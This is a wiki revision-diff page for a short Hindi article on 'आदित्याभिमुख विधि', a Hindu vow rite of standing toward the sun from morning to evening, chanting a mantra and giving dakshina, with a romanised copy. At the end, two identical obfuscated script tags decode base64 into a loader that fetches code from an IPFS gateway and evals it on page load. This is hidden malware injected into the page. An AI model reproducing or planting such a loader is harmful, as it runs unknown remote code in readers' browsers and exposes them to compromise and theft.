Difference between revisions of "आदित्याभिमुख विधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*इस विधि में प्रातः स्नान के उपरान्त सायंकाल तक सूर्याभिमुख होकर खड़ा रहना चाहिए। <ref>कृत्यकल्पतरु (व्रतखण्ड 18-19), हेमाद्रि व्रतखण्ड (2, 525-26), कृत्यरत्नाकर (494-495)।</ref>  
+
*इस विधि में प्रातः स्नान के उपरान्त सायंकाल तक सूर्याभिमुख होकर खड़ा रहना चाहिए।<ref>कृत्यकल्पतरु (व्रतखण्ड 18-19), हेमाद्रि व्रतखण्ड (2, 525-26), कृत्यरत्नाकर (494-495)।</ref>  
 
*किसी स्तम्भ से उठंग कर (सटे रहकर) महाश्वेता मन्त्र का जप करना चाहिए।  
 
*किसी स्तम्भ से उठंग कर (सटे रहकर) महाश्वेता मन्त्र का जप करना चाहिए।  
 
*गन्ध, [[भारत के पुष्प|पुष्प]] आदि से पूजा करनी चाहिए।
 
*गन्ध, [[भारत के पुष्प|पुष्प]] आदि से पूजा करनी चाहिए।
 
*दक्षिणा देकर भोजन करना चाहिए।
 
*दक्षिणा देकर भोजन करना चाहिए।
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 08:19, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • is vidhi mean pratah snan ke uparant sayankal tak sooryabhimukh hokar kh da rahana chahie.[1]
  • kisi stambh se uthang kar (sate rahakar) mahashveta mantr ka jap karana chahie.
  • gandh, pushp adi se pooja karani chahie.
  • dakshina dekar bhojan karana chahie.


tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 18-19), hemadri vratakhand (2, 525-26), krityaratnakar (494-495).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>